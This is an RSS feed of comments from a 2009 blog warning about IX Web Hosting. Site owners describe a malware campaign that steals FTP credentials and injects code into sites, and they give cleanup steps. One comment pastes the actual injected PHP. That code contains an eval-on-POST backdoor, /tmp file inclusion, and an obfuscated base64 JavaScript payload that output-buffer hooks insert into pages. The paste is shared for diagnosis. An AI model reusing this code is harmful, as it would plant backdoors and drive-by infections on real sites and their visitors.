Comments on: More than ONE THIRD of ALL IX Web Hosting sites INFECTED http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/ Unreliable, Insecure, Incompetant Web Hosting Thu, 05 Nov 2009 21:58:40 +0000 http://wordpress.com/ hourly 1 By: Fasteddy http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-220 Fasteddy Sat, 25 Apr 2009 11:14:36 +0000 http://ixwebhostwarning.wordpress.com/?p=131#comment-220 How to get rid of the tmp_lkojfghx Virus (for want of a better name) I battled this virus for a couple of months. It infected around a dozen of my websites and I think I understand how it operates and how to prevent it from spreading. Overview. This virus is a multi pronged attack on websites and computers. When you visit an infected site your PC may become infected. Your infected PC may be compromised with Spyware thus sending off FTP access information to the hackers. Hackers then use brute force to hack your password (if they don’t already have it). Your password and username is then used to hack your sites which then become malware sites and spread the virus further. Your site may even become blacklisted by Google and other sites. The Hackers Methods My opinion is that they infect your computer when you hit an infected site. The infection is some kind of spyware (or keylogging) which extracts FTP info from your browser. Probably the username. They then hack the password using brute force. The Website Attack A malicious (but valid) login using FTP access rewrites many of your website files. (check your FTP logs and align the times with your file dates and times) 1. PHP files will have malicious PHP script inserted at the start of the file bracketed by it’s own php tags. The original script is still present but is effectively disabled. These PHP files when accessed from the public domain will do one of two things:- They will firstly check for a variable sent by the POST method. This will be malicious code sent by the hacker and could vary each time. If no variable is present they will proceed to infect or re-infect the rest of the HTML files in your site. 2. HTML files will have malicious JAVASCRIPT inserted between the and tags. When this page is accessed from the public domain it proceeds to download malware into the visitor’s PC (possibly from some remote site). It will sometimes ask you to click to download a Microsoft addon for this site. The computer then experiences a lot of disk activity and browser lockup. (information may be extracted at this point but I’m not sure) Infected computers can slow down, experience browser hijacking and are probably infected with a keylogging virus or some other sort of spyware. 3. Javascript files (ending in .js) will have the same script as the HTML files inserted at the end of the file. These JS files are linked to html pages and thus have the same effect as being inserted directly in the html page. You can clean up the site but it will be attacked again in a few days and re-infected. Symptoms •Your web pages are slow loading…possibly while the malicious code communicates with it's master •When you visit the site, your computer starts frantic disk activity and browser locks up (I suggest hit the reset button and used System Restore at this stage) •A bar at the top of the page prompts you to download a Microsoft Add-on If your PC is compromised it may display the following symptoms •Computer has generally slowed down •You experience browser hijacking especially ‘search engine’ redirection •Other websites that you manage start to get infected Cure 1. Change your FTP login to a VERY STRONG PASSWORD - for example 14 characters with a mix of symbols included (use a clean pc that is not compromised) My experience is that simple passwords will get hacked again. Complex passwords will not. 2. Meticulously clean out all traces of the virus from your website by reloading pages or editing out the hack code. Check hidden directories for infected files. These may not show using your FTP client (go to the CPanel File Manager and have a look) 3. Cleanse your PC •Scan with your virus protection software (mine didn’t find it) •Use System Restore to revert back to before you got infected (this is the best way I have found) •Reformat your disk, reload windows and spend a couple of days reloading your PC *Ensure that System Restore is Enabled on your PC How to get rid of the tmp_lkojfghx Virus
(for want of a better name)

I battled this virus for a couple of months. It infected around a dozen of my websites and I think I understand how it operates and how to prevent it from spreading.

Overview.
This virus is a multi pronged attack on websites and computers.
When you visit an infected site your PC may become infected. Your infected PC may be compromised with Spyware thus sending off FTP access information to the hackers. Hackers then use brute force to hack your password (if they don’t already have it). Your password and username is then used to hack your sites which then become malware sites and spread the virus further. Your site may even become blacklisted by Google and other sites.

The Hackers Methods
My opinion is that they infect your computer when you hit an infected site. The infection is some kind of spyware (or keylogging) which extracts FTP info from your browser. Probably the username. They then hack the password using brute force.

The Website Attack
A malicious (but valid) login using FTP access rewrites many of your website files. (check your FTP logs and align the times with your file dates and times)

1. PHP files will have malicious PHP script inserted at the start of the file bracketed by it’s own php tags. The original script is still present but is effectively disabled.
These PHP files when accessed from the public domain will do one of two things:-
They will firstly check for a variable sent by the POST method. This will be malicious code sent by the hacker and could vary each time.
If no variable is present they will proceed to infect or re-infect the rest of the HTML files in your site.

2. HTML files will have malicious JAVASCRIPT inserted between the and tags. When this page is accessed from the public domain it proceeds to download malware into the visitor’s PC (possibly from some remote site). It will sometimes ask you to click to download a Microsoft addon for this site. The computer then experiences a lot of disk activity and browser lockup. (information may be extracted at this point but I’m not sure)
Infected computers can slow down, experience browser hijacking and are probably infected with a keylogging virus or some other sort of spyware.

3. Javascript files (ending in .js) will have the same script as the HTML files inserted at the end of the file. These JS files are linked to html pages and thus have the same effect as being inserted directly in the html page.

You can clean up the site but it will be attacked again in a few days and re-infected.

Symptoms
•Your web pages are slow loading…possibly while the malicious code communicates with it’s master
•When you visit the site, your computer starts frantic disk activity and browser locks up (I suggest hit the reset button and used System Restore at this stage)
•A bar at the top of the page prompts you to download a Microsoft Add-on

If your PC is compromised it may display the following symptoms
•Computer has generally slowed down
•You experience browser hijacking especially ‘search engine’ redirection
•Other websites that you manage start to get infected

Cure
1. Change your FTP login to a VERY STRONG PASSWORD – for example 14 characters with a mix of symbols included (use a clean pc that is not compromised) My experience is that simple passwords will get hacked again. Complex passwords will not.

2. Meticulously clean out all traces of the virus from your website by reloading pages or editing out the hack code. Check hidden directories for infected files. These may not show using your FTP client (go to the CPanel File Manager and have a look)

3. Cleanse your PC
•Scan with your virus protection software (mine didn’t find it)
•Use System Restore to revert back to before you got infected (this is the best way I have found)
•Reformat your disk, reload windows and spend a couple of days reloading your PC

*Ensure that System Restore is Enabled on your PC

]]> By: Eric http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-42 Eric Fri, 09 Jan 2009 03:07:54 +0000 http://ixwebhostwarning.wordpress.com/?p=131#comment-42 Here's the code: <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2Yoe WFob29fY291bn RlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCcvJTJGJTNDJCU2NCU2OSU3NiUyMCU3MyU3NHx5JTZDZSE9JTY0aSU3 M3AlNkMmYXx5JTNBIW4lNkZuJTY1QCUzRVxuI2RAJTZGYyU3NW0lNjUjbnQkJTJFJTc3JTcyJTY5fHQlNjUoISUyMiElM0 MvfCU3NCU2NSMlNzgjdHxhciU2NSYlNjElM0UiQCUyOSE7fnZhciUyMGlgJTJDX34sfmE9JCU1QiYlMjIlMzdAOEAuJTMxMWAw JTJFITEmNzUuJCUzMiUzMSUyMiYlMkMiJTMxJTM5fjV+LjIlMzRgLiUzNzZgLiUzMjVAJTMxfCIlNURgJTNCXyUzRCUzMXw7a WYlMjh+ZG9jQCU3NUBtZSZudH4lMkVjbyQlNkYlNkIlNjlgZX4lMkV+bSU2MSF0fiU2M0BoJiUyOCQlMkZ+JTVDYiQlNjhg Z34lNjZ8dH49IzEvJTI5QD09ISU2RX4lNzVsJTZDJTI5ZiU2RmAlNzIlMjgmJTY5PUAwfjskJTY5IyUzQyEyQCUzQmBpJTJ CJTJCKUAlNjRgb2BjISU3NW1+JTY1biU3NCMlMkV+d3J+aSF0fiU2NXwlMjgjJTIyJCUzQyU3MyU2M35yJTY5IyU3MGAlNz RAJTNFJCU2OSZmJCUyOCU1RiMlMjlkQCU2RiQlNjMmdUBtJTY1JTZFdC5gJTc3IXIlNjklNzRAJTY1QCgmJTVDfiUyMiUzQy U3MyZjfHIlNjlwdCUyMCU2OSU2NCUzRGAlNUZgIitpIyUyQiUyMn4lNUYlMjBgc0AlNzIlNjMmPSQlMkZgLyEiKyU2MSU1Qnwl NjklNUQlMkIlMjIlMkYjY3AlMkY/Iit+bmEmdmlnJTYxI3RvJTcyJTJFJTYxJTcwcGBOYXxtZWAuJTYzJTY4YGEkJTcyISU0MX QoJTMwJTI5KyElMjJgJTNFJTNDJTVDJTVDfiUyRnMlNjMhcml+cCU3NCElM0UhJTVDJCUyMiYlMjklM0N8JTVDISUyRiU3M3 wlNjMlNzJpcCQlNzQlM0UlMjIlMjlgOyFcbi8lMkYlM0MvISU2NCU2OSZ2JiUzRScpLnJlcGxhY2UoL2B8XCZ8XCR8I3xcIXxcf Hx+fEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i My sites run on the server block with mysql address mysql501.ixwebhosting.com. As a note, this is part of the new server block that runs php5. Here’s the code:

<?php if(!function_exists(‘tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2Yoe
WFob29fY291bn
RlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCcvJTJGJTNDJCU2NCU2OSU3NiUyMCU3MyU3NHx5JTZDZSE9JTY0aSU3
M3AlNkMmYXx5JTNBIW4lNkZuJTY1QCUzRVxuI2RAJTZGYyU3NW0lNjUjbnQkJTJFJTc3JTcyJTY5fHQlNjUoISUyMiElM0
MvfCU3NCU2NSMlNzgjdHxhciU2NSYlNjElM0UiQCUyOSE7fnZhciUyMGlgJTJDX34sfmE9JCU1QiYlMjIlMzdAOEAuJTMxMWAw
JTJFITEmNzUuJCUzMiUzMSUyMiYlMkMiJTMxJTM5fjV+LjIlMzRgLiUzNzZgLiUzMjVAJTMxfCIlNURgJTNCXyUzRCUzMXw7a
WYlMjh+ZG9jQCU3NUBtZSZudH4lMkVjbyQlNkYlNkIlNjlgZX4lMkV+bSU2MSF0fiU2M0BoJiUyOCQlMkZ+JTVDYiQlNjhg
Z34lNjZ8dH49IzEvJTI5QD09ISU2RX4lNzVsJTZDJTI5ZiU2RmAlNzIlMjgmJTY5PUAwfjskJTY5IyUzQyEyQCUzQmBpJTJ
CJTJCKUAlNjRgb2BjISU3NW1+JTY1biU3NCMlMkV+d3J+aSF0fiU2NXwlMjgjJTIyJCUzQyU3MyU2M35yJTY5IyU3MGAlNz
RAJTNFJCU2OSZmJCUyOCU1RiMlMjlkQCU2RiQlNjMmdUBtJTY1JTZFdC5gJTc3IXIlNjklNzRAJTY1QCgmJTVDfiUyMiUzQy
U3MyZjfHIlNjlwdCUyMCU2OSU2NCUzRGAlNUZgIitpIyUyQiUyMn4lNUYlMjBgc0AlNzIlNjMmPSQlMkZgLyEiKyU2MSU1Qnwl
NjklNUQlMkIlMjIlMkYjY3AlMkY/Iit+bmEmdmlnJTYxI3RvJTcyJTJFJTYxJTcwcGBOYXxtZWAuJTYzJTY4YGEkJTcyISU0MX
QoJTMwJTI5KyElMjJgJTNFJTNDJTVDJTVDfiUyRnMlNjMhcml+cCU3NCElM0UhJTVDJCUyMiYlMjklM0N8JTVDISUyRiU3M3
wlNjMlNzJpcCQlNzQlM0UlMjIlMjlgOyFcbi8lMkYlM0MvISU2NCU2OSZ2JiUzRScpLnJlcGxhY2UoL2B8XCZ8XCR8I3xcIXxcf
Hx+fEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg==’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'\"][^\s\'\"\.,;\?!\[\]:/\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(base64_decode(‘IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==’),”,$s);if(stristr($s,’</body’))$s=preg_replace(‘#(\s*</body)#mi’,str_replace(‘\$’,'\\\$’,TMP_XHGFJOKL).’\1′,$s1);elseif(($s1!=$s)||defined(‘PMT_knghjg’)||stristr($s,’<body’)||stristr($s,”))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i

My sites run on the server block with mysql address mysql501.ixwebhosting.com. As a note, this is part of the new server block that runs php5.

]]> By: neverixweb http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-41 neverixweb Fri, 09 Jan 2009 01:40:17 +0000 http://ixwebhostwarning.wordpress.com/?p=131#comment-41 Hi Eric. Thanks for taking the time to post about your issue, and the where abouts of the injected script. It is true that the script is Base64 coded, could you post your code here if you still have it, and could you please let me know on what servers your site(s) are hosted. Good Luck with your sites. Hi Eric.
Thanks for taking the time to post about your issue, and the where abouts of the injected script.
It is true that the script is Base64 coded, could you post your code here if you still have it, and could you please let me know on what servers your site(s) are hosted.
Good Luck with your sites.

]]> By: Eric http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-40 Eric Fri, 09 Jan 2009 00:56:45 +0000 http://ixwebhostwarning.wordpress.com/?p=131#comment-40 I also made the mistake of hosting with IX. One of my WordPress (WPMU v2.7) blogs was recently infected with the so called "Yahoo! Counter" virus. I wasted an entire afternoon looking for the code which is encrypted in base 64 to avoid detection when searching with terms like "Yahoo" I finally found the code at the very end of my wp-config.php file (compare to wp-config-sample.php if you have it). This file had 755 permissions. @neverixweb: Could you mention this in a post? I couldn't find a clear fix for wordpress users on Google so I thought I'd contribute mine. I also made the mistake of hosting with IX. One of my WordPress (WPMU v2.7) blogs was recently infected with the so called “Yahoo! Counter” virus. I wasted an entire afternoon looking for the code which is encrypted in base 64 to avoid detection when searching with terms like “Yahoo”

I finally found the code at the very end of my wp-config.php file (compare to wp-config-sample.php if you have it). This file had 755 permissions.

@neverixweb: Could you mention this in a post? I couldn’t find a clear fix for wordpress users on Google so I thought I’d contribute mine.

]]>